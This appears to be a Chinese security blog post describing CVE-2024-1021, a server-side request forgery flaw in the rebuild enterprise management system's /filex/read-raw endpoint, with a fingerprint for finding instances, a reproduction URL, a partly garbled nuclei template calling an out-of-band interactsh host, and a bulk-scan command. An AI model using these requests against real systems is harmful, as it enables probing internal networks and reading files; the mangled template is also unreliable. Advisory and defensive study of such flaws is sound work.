免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
rebuild read-raw服务器端请求伪造漏洞
02
—
漏洞影响
rebuild <= 3.5.5
03
—
漏洞描述
第rebuild是一个开源项目,地址如下
https://gitee.com/getrebuild/rebuild
https://github.com/getrebuild/rebuild
rebuild是一个高度可配置化的企业管理系统!可免费商用!低代码/零代码快速搭建企业中台、CRM客户关系管理、WMS库存管理、TMS运输管理、SCM供应链管理,外贸管理,甚至是 ERP 企业资源计划!
该系统/filex/read-raw接口处存在SSRF漏洞,攻击者能够以此为跳板攻击内网。
关于SSRF漏洞的形成原因和原理前几天在CVE-2024-21642漏洞那篇文章中讲过了,感兴趣的可以看下。
04
—
icon_hash="871154672"
05
—
漏洞分析
向靶场发送如下数据包
在FileDownLoader类的readRawText方法中,接收url、charset和cut参数,并调用0kHttpUtils.get方法来发起对该url的http请求。
获取远程url请求的返回值并直接输出,不进行任何筛选。
这个漏洞可以用来检测内网服务、端口等信息,甚至读取文件。
06
—
漏洞复现
这是个开源项目,部署方法在项目README文件里面写的比较详细,就不再赘述。
http://127.0.0.1:18080/filex/read-raw?url=http://127.0.0.1:9999&cut=1
漏洞复现成功
07
—
批量漏扫
nuclei poc文件内容如下,年关将至,工作比较繁忙,一天写文章的时间只有半小时左右,POC难免不严谨,如有纰漏欢迎私信指正。
id: CVE-2024-1021
info:
name: rebuild read-raw服务器端请求伪造漏洞
author: fgz
severity: critical
description: rebuild是一个高度可配置化的企业管理系统!可免费商用!低代码/零代码快速搭建企业中台、CRM客户关系管理、WMS库存管理、TMS运输管理、SCM供应链管理,外贸管理,甚至是 ERP 企业资源计划!该系统3.5.5及以前版本的/filex/read-raw接口处存在SSRF漏洞,攻击者能够以此为跳板攻击内网。
metadata:
1 :
"dtale/static/images/favicon.png" :
verified: true
requests:
raw:
|+
GET /filex/read-raw?url=http%3A%2F%2F{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 :
gzip, deflate :
zh-CN,zh;q=0.9,en;q=0.8 :
Connection: close
matchers:
type: dsl
dsl:
contains(interactsh_protocol, "dns")
condition: and
运行POC
nuclei.exe -l data/rebuild.txt -t mypoc/cve/CVE-2024-1021.yaml
08
—
修复建议
升级到最新版本。
08
—
资料领取
在文章末尾点发消息发送关键字免费领取。
后台发送【电子书】关键字获取学习资料网盘地址
后台发送【POC】关键字获取POC网盘地址
后台发送【工具】获取渗透工具包
原文始发于微信公众号(AI与网安):CVE-2024-1021
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论